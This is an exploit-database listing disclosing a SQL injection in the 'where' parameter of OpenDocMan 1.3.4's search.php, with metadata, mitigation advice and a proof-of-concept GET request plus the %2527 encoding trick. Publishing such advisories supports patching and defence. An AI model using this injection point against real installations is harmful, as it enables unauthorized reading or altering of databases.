OpenDocMan 1.3.4 - 'where' SQL Injection

vendor:

OpenDocMan

by:

Mehmet EMIROGLU

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: OpenDocMan

Affected Version From: 1.3.2004

Affected Version To: 1.3.2004

Patch Exists: NO

Related CWE:

CPE: a:opendocman:opendocman:1.3.4

Metasploit:

Other Scripts:

Platforms Tested: Wamp64, @Win

2019

OpenDocMan 1.3.4 – ‘where’ SQL Injection

This exploit allows an attacker to inject SQL code in the 'where' parameter of the search.php page in OpenDocMan 1.3.4, which can lead to unauthorized access or manipulation of the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries, and to use prepared statements or parameterized queries.

Source

Exploit-DB raw data:

===========================================================================================
# Exploit Title: OpenDocMan 1.3.4 - ’where’ SQL Injection
# CVE: N/A
# Date: 05/03/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/opendocman/files/
# Software Link: https://sourceforge.net/projects/opendocman/files/
# Version: v1.3.4
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: OpenDocMan is a web based document management
system (DMS) written in PHP designed
  to comply with ISO 17025 and OIE standard for document management.
  It features fine grained control of access to files, and automated
install and upgrades.
===========================================================================================
# POC - SQLi
# Parameters : where
# Attack Pattern : %2527
# GET Request :
http://localhost/opendocman/search.php?submit=submit&sort_by=id&where=[SQL Inject Here]&sort_order=asc&keyword=Training Manual&exact_phrase=on
===========================================================================================